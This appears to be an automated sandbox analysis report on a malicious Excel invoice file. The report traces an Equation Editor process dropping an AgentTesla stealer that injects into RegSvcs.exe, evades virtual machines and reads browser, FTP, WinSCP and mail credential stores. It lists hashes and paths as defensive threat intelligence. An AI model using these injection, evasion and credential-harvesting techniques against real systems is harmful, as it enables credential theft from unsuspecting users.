Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: Fatura 002.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

PE file contains an invalid checksum

Source: food[1].exe.2.dr	Static PE information: real checksum: 0xa2135 should be: 0x120c6d
Source: coolz.exe.2.dr	Static PE information: real checksum: 0xa2135 should be: 0x120c6d

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 6_2_00267988 push esp; ret

6_2_00267995

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to dropped file

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

API/Special instruction interceptor: Address: 362D6CC

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3544

Thread sleep time: -360000s >= -30000s

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03670754 mov edx, dword ptr fs:[00000030h]

2_2_03670754

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior

Source: coolz.exe, 00000005.00000000.472546872.0000000000482000.00000002.00000001.01000000.00000004.sdmp, food[1].exe.2.dr, coolz.exe.2.dr

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000006.00000002.622210442.0000000002001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

ID:	1523149
Product:	CloudBasic
Start time:	07:43:11
Start date:	01.10.2024
Sample:	Fatura 002.xlam.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	404eec23afb533475c11493f7d367ec0
SHA1:	844ba233d3ba4ecc44596bc78f90eecffd0286de
SHA256:	eab869eef3b586266919e8d303d196beeb0f22d3f3cbc7b1f521a7e67acd4cf5
Filetype:	Excel Microsoft Office Open XML Format document (35004/1) 81.40%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	0FCFEEFEF9E389286B0EF7E97E1E7F28	85986DADC140D6D719B844E6F38D775DFAD211D5	C186DEF00D97AABDF95CF1BBD2605EF8FFC8A05E13FFF501B0117AE7395D4487
C:\Users\user\AppData\Local\Temp\coolz.exe	PE32 executable (GUI) Intel 80386, for MS Windows	0FCFEEFEF9E389286B0EF7E97E1E7F28	85986DADC140D6D719B844E6F38D775DFAD211D5	C186DEF00D97AABDF95CF1BBD2605EF8FFC8A05E13FFF501B0117AE7395D4487
C:\Users\user\AppData\Local\Temp\prespecialist	data	67BFE1B318F14BB23F9EC813672E74BA	2E2070091AEF4247C297AFC3F57F7EF3BD42DB1E	ABEC001525336B8D15840F6E9A93B0B6D3C27D020AD3F18B5091D9585B57F8C3
C:\Users\user\Desktop\~$Fatura 002.xlam.xls	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\user\Desktop\~$Fatura 002.xlam.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

Windows Analysis Report
Fatura 002.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Fatura 002.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Fatura 002.xlam.xlsx

Malware Threat Intel
Provided by